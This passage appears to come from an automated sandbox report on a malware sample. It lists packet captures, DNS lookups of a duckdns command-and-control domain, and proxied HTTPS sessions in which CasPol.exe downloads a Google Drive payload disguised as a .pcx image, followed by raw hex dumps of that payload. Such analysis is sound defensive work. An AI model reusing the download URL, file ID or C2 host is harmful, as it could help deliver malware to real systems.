                                                                    Feb 4, 2023 04:01:35.612389088 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:01:36.372617960 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:01:36.424643993 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:01:38.814868927 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:01:38.904680014 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:01:40.571378946 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:01:40.627012014 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:01:44.452286005 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:01:44.501046896 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:01:44.829185009 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:01:44.907814980 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:01:45.571717024 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:01:45.625837088 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:01:50.581248045 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:01:50.624661922 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:01:50.827950001 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:01:50.924731970 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:01:52.566123009 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:01:52.608740091 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:01:55.597141027 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:01:55.639174938 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:01:56.811089039 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:01:56.893338919 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:00.606307983 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:00.653794050 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:00.696707964 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:00.747488022 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:02.809703112 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:02.892667055 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:05.621222019 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:05.668258905 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:07.824357033 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:07.919336081 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:08.749182940 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:08.792634964 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:10.623563051 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:10.667119026 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:13.822829008 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:13.921634912 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:15.629554033 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:15.681755066 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:16.848452091 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:16.900157928 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:19.821499109 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:19.905559063 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:20.640506029 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:20.696196079 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:24.955001116 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:25.007694006 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:25.643085957 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:25.695063114 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:25.835774899 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:25.923583984 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:30.658982992 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:30.709606886 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:31.834449053 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:31.925381899 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:33.039323092 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:33.084245920 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:35.670449972 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:35.724117994 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:37.817557096 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:37.910891056 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:40.683641911 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:40.738760948 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:41.120898008 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:41.176136017 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:43.816319942 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:43.907922983 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:45.689274073 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:45.737636089 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:49.206326962 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:49.236881018 CET498573498192.168.11.2091.193.75.146
                                                                    Feb 4, 2023 04:02:49.330677032 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:50.692460060 CET34984985791.193.75.146192.168.11.20
                                                                    Feb 4, 2023 04:02:50.736505032 CET498573498192.168.11.2091.193.75.146

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Feb 4, 2023 03:57:07.229824066 CET5132953192.168.11.201.1.1.1
                                                                    Feb 4, 2023 03:57:07.239095926 CET53513291.1.1.1192.168.11.20
                                                                    Feb 4, 2023 03:57:08.025192976 CET5412753192.168.11.201.1.1.1
                                                                    Feb 4, 2023 03:57:08.065241098 CET53541271.1.1.1192.168.11.20
                                                                    Feb 4, 2023 03:57:09.862443924 CET5576653192.168.11.201.1.1.1
                                                                    Feb 4, 2023 03:57:09.968810081 CET53557661.1.1.1192.168.11.20

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Feb 4, 2023 03:57:07.229824066 CET192.168.11.201.1.1.10xbccbStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                    Feb 4, 2023 03:57:08.025192976 CET192.168.11.201.1.1.10x6144Standard query (0)doc-0c-b0-docs.googleusercontent.comA (IP address)IN (0x0001)false
                                                                    Feb 4, 2023 03:57:09.862443924 CET192.168.11.201.1.1.10xf9aStandard query (0)masterpat0nms672ns.duckdns.orgA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Feb 4, 2023 03:57:07.239095926 CET1.1.1.1192.168.11.200xbccbNo error (0)drive.google.com142.250.185.110A (IP address)IN (0x0001)false
                                                                    Feb 4, 2023 03:57:08.065241098 CET1.1.1.1192.168.11.200x6144No error (0)doc-0c-b0-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                    Feb 4, 2023 03:57:08.065241098 CET1.1.1.1192.168.11.200x6144No error (0)googlehosted.l.googleusercontent.com142.250.186.161A (IP address)IN (0x0001)false
                                                                    Feb 4, 2023 03:57:09.968810081 CET1.1.1.1192.168.11.200xf9aNo error (0)masterpat0nms672ns.duckdns.org91.193.75.146A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • drive.google.com
                                                                    • doc-0c-b0-docs.googleusercontent.com

                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.11.2049855142.250.185.110443C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2023-02-04 02:57:07 UTC0OUTGET /uc?export=download&id=1GWkPMapRdWHnFBq8NG4QBMUUzbTsJcvy HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                    Host: drive.google.com
                                                                    Cache-Control: no-cache
                                                                    2023-02-04 02:57:07 UTC0INHTTP/1.1 303 See Other
                                                                    Content-Type: application/binary
                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                    Pragma: no-cache
                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                    Date: Sat, 04 Feb 2023 02:57:07 GMT
                                                                    Location: https://doc-0c-b0-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/gop7ht5qt6iu260mrr5822id2hevfvup/1675479375000/07900185898442636486/*/1GWkPMapRdWHnFBq8NG4QBMUUzbTsJcvy?e=download&uuid=5cfb3928-a799-4c74-b6f0-f4c0849b8739
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                    Content-Security-Policy: script-src 'nonce-M6FOSMkxYysdwyovZ2-Lyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                    Server: ESF
                                                                    Content-Length: 0
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Content-Type-Options: nosniff
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.11.2049856142.250.186.161443C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2023-02-04 02:57:08 UTC1OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/gop7ht5qt6iu260mrr5822id2hevfvup/1675479375000/07900185898442636486/*/1GWkPMapRdWHnFBq8NG4QBMUUzbTsJcvy?e=download&uuid=5cfb3928-a799-4c74-b6f0-f4c0849b8739 HTTP/1.1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                    Cache-Control: no-cache
                                                                    Host: doc-0c-b0-docs.googleusercontent.com
                                                                    Connection: Keep-Alive
                                                                    2023-02-04 02:57:08 UTC1INHTTP/1.1 200 OK
                                                                    X-GUploader-UploadID: ADPycdumPrLLlGc8b3LapwFp7o_BnKOYdYzUnH_KiPdqykhSJh0DezxyMh1_BP7ciUA4c30AE4YeTUdAqFogqZseZnFP3A
                                                                    Content-Type: image/pcx
                                                                    Content-Disposition: attachment; filename="RnSBpaECNsDRDgS69.pcx"; filename*=UTF-8''RnSBpaECNsDRDgS69.pcx
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Credentials: false
                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context
                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                    Content-Length: 207936
                                                                    Date: Sat, 04 Feb 2023 02:57:08 GMT
                                                                    Expires: Sat, 04 Feb 2023 02:57:08 GMT
                                                                    Cache-Control: private, max-age=0
                                                                    X-Goog-Hash: crc32c=/OoKRw==
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2023-02-04 02:57:08 UTC5INData Raw: 09 c9 f2 c7 40 ac 12 5f 91 5c 54 3a ac 6c b9 39 ba 0c a7 e2 9e 9c 79 01 5a 89 40 2c 1b 70 30 a8 16 c8 18 86 84 00 24 1a f4 fd 13 f0 c6 b5 fb 2c 5d 03 43 ed 56 cb bc 89 50 1a c0 61 2f c3 9a 93 9d 1f 99 3b 7f 99 ac fc a3 6b 08 be 94 ee f7 38 7e 0a d0 31 ca 63 e8 ca 66 8d 58 58 39 ef 20 e6 c6 ef 5a b2 85 d6 08 6f f3 13 6e fc 00 06 f3 ae 3d bc b8 ea d0 4c e5 d7 6a e7 c0 07 27 ba 9e 1e 83 8c e9 a6 a7 4d 0e 00 7b 6d 08 47 2b b8 0c fd 27 e4 48 ea 15 9f f8 ea 83 23 50 94 7c a5 0f 0e 7f b3 f9 b2 f7 c9 5d 13 06 2c 66 63 38 59 ae 9d ba e8 d4 8e 05 0e 8f 67 2c 00 27 56 61 fd a5 65 70 ed a6 c0 e0 f0 f1 f8 5b 35 1e 94 8a 8e 87 e3 23 15 9c b1 ee 5f 86 d4 34 de d0 4e 9e dc b5 ad d1 07 67 18 1d 14 06 1f 2f ff eb 66 be 90 c9 9f d0 24 bb 9c 57 10 36 2f 32 88 7c 89 ed 9a 80
                                                                    Data Ascii: @_\T:l9yZ@,p0$,]CVPa/;k8~1cfXX9 Zon=Lj'M{mG+'H#P|],fc8Yg,'Vaep[5#_4Ng/f$W6/2|
                                                                    2023-02-04 02:57:08 UTC9INData Raw: 0b 01 89 c3 c4 e1 cc ca 58 e6 3f b4 08 b9 26 c3 48 7e 32 6c 52 89 3b 69 fe 1b 2c 38 aa 8d f3 82 87 38 35 33 4b 05 ab 28 12 26 f4 80 1e 54 d0 5c 4c 46 ae 45 e5 ea c7 37 fe 63 3a 70 d7 ad 8f 7c 8a 6b 0d e6 e6 08 00 5e a6 a1 07 dd 59 cb 59 0b f5 fd 40 e5 46 43 62 74 f5 23 35 1b c4 32 5c 74 c9 b0 18 32 2a c4 40 29 d2 89 b8 c6 2d 38 61 77 10 89 66 5b 85 ec 82 95 05 4d d2 eb e5 86 8d b1 4d ac ed de 3f eb 0f 6e 0f 4f 05 0f ee 1b d5 e6 47 4b 7f 6c 5b 4b cc 02 7a 49 28 b1 d4 e9 69 34 4a 39 c7 68 d3 f1 ee 24 7f 51 14 5d 27 5c 24 d6 38 a0 7f 5d dd 62 bb 25 1c fe ed 26 37 74 d7 d3 e4 a7 f1 89 ba a8 c0 7d bf 31 e2 54 b0 f5 92 bd 33 e2 2d 2e bd 91 a1 e4 83 73 7f 9e 52 82 b8 30 de 3d 46 d3 19 fe 1f 34 fb 13 db a4 bb b3 94 8b 9b e3 17 53 47 db c7 45 28 8b a9 3c 05 97 6c
                                                                    Data Ascii: X?&H~2lR;i,8853K(&T\LFE7c:p|k^YY@FCbt#52\t2*@)-8awf[MM?nOGKl[KzI(i4J9h$Q]'\$8]b%&7t}1T3-.sR0=F4SGE(<l
                                                                    2023-02-04 02:57:08 UTC13INData Raw: db 43 0b b8 5c 29 b2 ae 12 57 de 10 46 2b 4c ac 2d b4 35 e2 0b 25 4d bd 0d 90 47 07 22 e6 0b cb 15 29 01 20 28 93 8e a6 68 0d 5a ce 38 39 e9 ce 5e 3e df d2 5a 15 55 11 ac 16 cf 5d 2b de 3a a5 bc 7d c7 99 61 6f 9e 58 cd 71 c0 a2 0f 85 5d da 99 8d bd 27 3b 7f d5 0f e8 02 4b f9 6a 93 18 74 24 08 4e 2f c1 d5 c7 43 e4 23 fe f1 22 d3 f7 51 b2 6b e1 c7 e7 88 ed e5 4f 8f 88 fa 9d c1 78 71 88 c5 b8 3c b4 1e e7 74 82 36 c5 34 c8 c3 ac f2 aa 61 9b db 50 5c 9a d6 8d cc 41 12 ee 71 15 aa fd 5f e3 10 45 46 df 96 02 e4 f2 5e 3b 11 0a 5f 79 38 f4 56 02 dd 12 42 9c d1 5e 39 3e 7c 32 ad fc a7 41 08 be 7a 6f 8a 38 c6 0e f0 15 ea b3 f6 e2 d9 8d 58 5e 11 47 20 e6 cc f8 77 b9 a3 d0 20 c1 f3 13 64 d1 06 2d f0 a4 16 4f 92 ec f8 e3 e5 d7 60 f9 ed 2b 81 bd b6 35 8c 93 55 b6 8a dc
                                                                    Data Ascii: C\)WF+L-5%MG") (hZ89^>ZU]+:}aoXq]';Kjt$N/C#"QkOxq<t64aP\Aq_EF^;_y8VB^9>|2Azo8X^G w d-O`+5U
                                                                    2023-02-04 02:57:08 UTC17INData Raw: c3 08 ab b1 3d 7e 42 d2 60 ce ae 82 71 d2 c1 57 a3 dd c9 a4 f3 88 3d 49 50 b1 b6 6b 7f fd 18 36 04 db 6f b2 43 a8 64 61 1e de 32 65 15 ec e6 5d e1 71 57 9d 95 b6 63 2d 27 73 09 da d0 3d b6 6b 4d 5d 6f a6 c1 af 44 fc e5 19 aa 15 ea 1d 2e 08 cc c9 91 f1 e9 82 0a cf 7e 09 d9 1e e5 0a 57 ab 7f bc 6c d8 25 6d 12 0a a9 14 75 ad 95 c7 1c a6 88 92 74 1c 94 90 73 48 3d 8e 07 a2 ca f4 e6 3b c6 71 ff 20 b2 1a 99 75 2f 48 7e 3c 49 9a b5 33 4b 94 74 40 32 bd aa c1 82 a4 f4 6e 3b 6f 18 b3 dd 12 16 f2 a8 aa 54 d0 5a 64 25 b9 5b c2 3e e2 40 cc 85 3c 5e fa a1 a5 6f ac 40 f9 cc c3 1e 1c 43 b4 a3 3a c4 59 ca 46 38 ea e0 12 ef 60 2c 33 74 f5 38 37 cb ef de 70 46 10 a4 0e 3a 0a f1 63 f9 cc a1 47 c6 2d 3c 5f c1 3d 83 4a 3a b1 ea a4 ba 2e 40 d2 0f cf 86 79 93 67 1a f4 f3 27 e1
                                                                    Data Ascii: =~B`qW=IPk6oCda2e]qWc-'s=kM]oD.~Wl%mutsH=;q u/H~<I3Kt@2n;oTZd%[>@<^o@C:YF8`,3t87pF:cG-<_=J:.@yg'
                                                                    2023-02-04 02:57:08 UTC17INData Raw: 34 de d4 97 36 f6 cf a8 ac 62 42 d1 1c cf 50 9a f4 35 0a 96 f5 45 3b 96 d5 93 c7 cb af 15 83 22 58 c7 60 5b e1 ba 9e a7 63 4d bc 7c f8 8d 4e 0f 7f b7 10 46 2d 4d 04 2d a5 41 84 26 26 6f b6 6c ba bc 19 0c 1b 23 37 13 01 a3 fe 0c bc bf c7 6b 2b 7b d7 1f 0a cf ba 26 ca fb 08 59 10 a1 37 ae 07 ca e0 0d c8 2f 88 f6 55 cb b8 4c 7f 93 58 df 4a ee b2 1a 0a 15 da 99 91 cc 66 1d 7f f0 44 e0 0b c6 b2 5a 99 19 3e 7f 08 4e 25 d0 d0 d0 19 ea 30 c3 ee 15 f5 95 c2 50 a2 c1 57 82 88 eb c7 8e a5 89 f0 b3 1f 7e 76 a6 67 95 39 98 ea e1 7a 4e 5c ee cd c2 d0 a8 f0 9e 42 97 5e 80 42 b2 16 8d cc 56 49 33 70 15 aa cd 13 af 36 49 b0 98 bd 28 e2 9c c8 3a 11 0c 59 4c 70 ad 23 04 92 dc 43 9c d6 43 21 72 7d 99 aa 93 d9 6a 08 b8 6d 39 bd 39 c6 0c bf b1 cb 63 ee cc 0e c6 59 58 3f 80 a4
                                                                    Data Ascii: 46bBP5E;"X`[cM|NF-M-A&&ol#7k+{&Y7/ULXJfDZ>N%0PW~vg9zN\B^BVI3p6I(:YLp#CC!r}jm99cYX?
                                                                    2023-02-04 02:57:08 UTC18INData Raw: 8e 86 f0 13 16 9c 94 0e 5f 88 96 3f df c7 4c 9d 67 bf ac d1 6f 7b 35 05 32 01 09 d2 14 eb 66 b4 b7 de f0 dd 25 b9 96 50 07 19 21 33 a8 76 8e c7 93 ab e1 f2 df b5 2e 4b 04 ac 72 ab b1 37 10 49 f9 80 cc 86 3f 41 d1 cb 40 a1 cb e3 8a ef a5 2f 4f de 91 6b 5e 57 2a c7 36 02 f1 0c 9e 92 b6 46 86 33 ed 12 44 68 8c e7 5b fe 49 71 97 b4 97 79 54 27 79 2f d3 d3 31 bc 40 b4 2e 95 8e a0 a4 6e e8 eb 17 ed be ea 1d 2e 07 ee df b9 94 d9 81 00 8f 80 08 d3 fb d7 07 6d 7f 6e bf 7f fd 0d 2b 1d 0a 5d 11 39 bc 91 e6 31 d6 58 8c 56 8c 60 90 75 6a a1 26 07 a4 e8 83 ca 38 ea 84 f6 23 b5 1c 96 32 a3 48 7e 3c b3 52 bb 10 49 d9 68 40 38 aa 87 cd a4 ea 8e 13 38 f9 06 9b 23 10 16 e0 80 78 2e d0 56 4c 44 b9 5b d3 d0 e5 4c 68 63 3a 74 bf ab a4 6e 84 d6 f9 cc e2 32 10 ae 36 87 7c c4 27
                                                                    Data Ascii: _?Lgo{52f%P!3v.Kr7I?A@/Ok^W*6F3Dh[IqyT'y/1@.n.mn+]91XV`uj&8#2H~<RIh@88#x.VLD[Lhc:tn26|'
                                                                    2023-02-04 02:57:08 UTC20INData Raw: 10 18 66 e6 d6 7f 81 8a 96 64 a7 e2 55 57 00 83 5f 96 fb d5 b3 33 e2 2d da 9b 90 4a d4 82 81 63 9e 52 81 88 3a de 00 5c d3 15 b8 1f 34 fa 11 c0 8b 96 9b ea f0 8d a5 17 57 6b c6 dc 43 0e 36 5d 16 07 c7 70 56 16 64 9f 1f d7 2d b6 c8 d3 bd 7c c0 01 2f 63 42 71 5b 17 4c 0a 82 0d 5a 3b 67 05 a8 ae 95 5e 54 e4 8a 2b 04 db 55 1c 1a 85 71 38 17 a7 96 b4 6f 6d 81 8d b9 fd 65 8b 1d 9b 1a b2 c1 c0 c4 71 91 b4 83 c8 de 79 d8 6d 12 3d 6e 7a d2 f6 5e c0 ea 2d 58 41 e7 7c b6 bd cc 58 f5 dd 91 c3 5b d0 a9 78 42 68 2c c2 ff 2e e4 d3 35 2d f4 00 5b 7d 9c f3 94 cb 76 de 15 c8 23 55 ce 48 53 43 a2 c8 f0 62 4d be 74 90 a9 9e 1b 89 44 38 0a 2b 65 a6 05 c4 4b 9f 01 fb 49 b7 6c bc 96 09 0a 19 0b cb 13 01 20 a9 28 95 d1 8b 6b 2a 62 fd 36 12 a5 bd 06 3e 96 d8 47 29 20 49 ae 01 e6
                                                                    Data Ascii: fdUW_3-JcR:\4WkC6]pVd-|/cBq[LZ;g^T+Uq8omeqym=nz^-XA|X[xBh,.5-[}v#UHSCbMtD8+eKIl (k*b6>G) I
                                                                    2023-02-04 02:57:08 UTC21INData Raw: ec f3 4f 27 11 0a 5f 64 75 ac 2d 59 fd 70 04 9c d0 44 0b 3b 5c 99 c6 76 a7 65 08 be 6b 11 ec 08 c2 0a ae 31 ca 63 a5 ca 26 9c 26 62 39 ef 24 89 98 ef 5a b8 9b fb 0b 49 d8 47 62 d7 fb 14 f1 86 62 bc b8 e0 cb 61 ee f1 6c 9c d5 07 a7 be b3 19 a6 90 59 83 54 d2 30 cb 21 c0 09 0b e2 f6 68 95 4e 91 b6 b0 42 d8 d3 98 e2 44 6d da 03 ed 67 1a 1e 93 9b d3 d0 9b 32 5b f6 5b 20 bc 7c 16 fb 95 64 87 b0 ed 03 62 82 6d 02 de 24 5d 4a 1d b7 67 08 ca a6 c0 a6 dc 54 26 f4 00 f5 3e 9c 80 87 e3 38 7a ff b1 0e 55 54 ff 3f cd d7 52 9e 14 b4 ad fc 65 6b 22 1d 3e 40 1f bd 19 e8 66 be b0 a6 f0 d0 2a b9 9c 57 10 6d 1f 31 a8 11 89 ed 98 ce 07 f2 ce b6 5a 5b 01 ac f0 8b 83 11 84 57 d1 6e ce ae 97 2e f0 c0 6d a9 f1 e5 e0 be 88 2c 6d d8 85 18 42 57 02 1c 1e 20 fa 24 9b 84 9b 4f b8 35
                                                                    Data Ascii: O'_du-YpD;\vek1c&&b9$ZIGbbalYT0!hNBDmg2[[ |dbm$]JgT&>8zUT?Rek">@f*Wm1Z[Wn.m,mBW $O5
